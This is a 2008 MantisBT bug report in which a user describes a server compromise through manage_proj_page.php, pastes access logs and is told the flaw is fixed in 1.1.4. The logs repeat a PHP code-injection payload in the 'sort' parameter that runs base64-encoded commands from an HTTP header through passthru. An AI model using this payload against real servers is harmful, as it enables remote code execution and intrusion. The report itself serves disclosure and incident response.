View Issue Details

IDProjectCategoryView StatusLast Update
0009858mantisbtsecuritypublic2009-06-26 12:06
Reportercooper64 Assigned Tothraxisp  
PrioritynormalSeveritycrashReproducibilityN/A
Status closedResolutionfixed 
Product Version1.1.2 
Summary0009858: Security problem - XSS attac possible in Mantis 1.1.2
Description

Because I got still no answer in the forum, i write in my problem here again.
On last Sunday my server was attacked over a security hole in Mantis.

My provider informed me about the attack and that the file manage_proj_page.php was the attack-point.

In the result my crontab was overwrite whith this entry:

        • /pages/eb/d0005490/home/htdocs/testserver/mantis/mc-root/update > /dev/null 2>&1

Also the directory mc-root was created in the mantis directory with any files (some looks like system files - i'm not a linux-user) and a virus named: Linux Procfake.

I have Mantis now completely closed.

Additional Information

Here my Log:

75.127.107.0 - - [15/Nov/2008:08:36:44 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:36:48 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3758 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:37:15 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 4190 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:37:20 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3866 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:00:24 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:09 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:11 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3783 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:14 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3794 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:29 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3659 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:39 +0100] "GET
/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23
HTTP/1.0" 200 3732 "-" "-"

TagsNo tags attached.

Relationships

duplicate of 0009704 closedgiallu Remote Code Execution in manage_proj_page.php 

Activities

thraxisp

thraxisp

2008-11-19 11:11

reporter   ~0019943

This is fixed in 1.1.4

Issue History

Date Modified Username Field Change
2008-11-19 11:03 cooper64 New Issue
2008-11-19 11:11 thraxisp Note Added: 0019943
2008-11-19 11:11 thraxisp Relationship added duplicate of 0009704
2008-11-19 11:11 thraxisp Status new => resolved
2008-11-19 11:11 thraxisp Resolution open => fixed
2008-11-19 11:11 thraxisp Assigned To => thraxisp
2009-06-26 12:06 vboctor Status resolved => closed